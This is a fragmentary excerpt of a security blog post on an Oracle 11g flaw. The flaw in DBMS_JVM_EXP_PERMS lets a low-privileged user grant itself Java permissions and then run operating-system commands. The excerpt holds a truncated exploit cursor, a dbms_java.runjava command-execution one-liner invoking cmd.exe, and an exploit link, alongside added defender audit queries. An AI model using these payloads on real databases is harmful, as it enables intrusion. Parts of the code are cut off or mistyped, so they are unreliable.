Essentially, because of a flaw in the DBMS_JVM_EXP_PERMS package, any user with just CREATE SESSION privileges can grant himself all Java privileges.
CURSOR C1 IS SELECT 'GRANT',USER(), 'SYS','java.io.FilePermission','<
FETCH C1 BULK COLLECT INTO POL;
Once the Java permissions are available, an end user can simply create a procedure and execute OS commands from it (http://milw0rm.com/exploits/2837).
However, if the create/execute procedure permissions are not available, David has another way to still execute OS code:
select dbms_java.runjava('oracle/aurora/util/Wrapper c:\\windows\\syste\\cmd.exe /c dir>c:\\out.lst') from dual;
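A defender-side check for the exposure described above, added here as an example and not taken from the original article or presentation: it lists who may execute the packages the article names and which accounts hold Java policy grants. It assumes an account that can read the DBA_* dictionary views; the list of built-in grantees excluded in the second query is an assumption and should be adjusted to the local installation.

```sql
-- Added example (not from the original article).
-- 1) Who can execute the packages named in the article?
--    A row with GRANTEE = 'PUBLIC' means every account that can log in
--    (CREATE SESSION only) is able to call the package.
SELECT grantee,
       owner,
       table_name AS package_name,
       privilege
FROM   dba_tab_privs
WHERE  table_name IN ('DBMS_JVM_EXP_PERMS', 'DBMS_JAVA')
AND    privilege = 'EXECUTE'
ORDER  BY table_name, grantee;

-- 2) Which accounts hold Java policy grants?
--    The article's cursor builds a 'GRANT' row for java.io.FilePermission,
--    so unexpected grantees of that type are the first thing to review.
--    The NOT IN list below is an assumed set of built-in grantees.
SELECT grantee,
       type_schema,
       type_name,
       name,
       action,
       enabled,
       seq
FROM   dba_java_policy
WHERE  kind = 'GRANT'
AND    grantee NOT IN ('SYS', 'SYSTEM', 'PUBLIC',
                       'JAVASYSPRIV', 'JAVAUSERPRIV', 'JAVADEBUGPRIV',
                       'JAVA_ADMIN', 'JAVA_DEPLOY', 'EJBCLIENT')
ORDER  BY CASE WHEN type_name = 'java.io.FilePermission' THEN 0 ELSE 1 END,
          grantee,
          seq;
```

Any ordinary application or end-user account returned by the second query, particularly one with a java.io.FilePermission entry, should be traced back to a documented change.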
The video of this presentation can be downloaded here.
Some of them said Blackhat has removed this video, but I was able to download it last week.
Article from: http://www.notsosecure.com/folder2/2010/02/04/hacking-oracle-11g/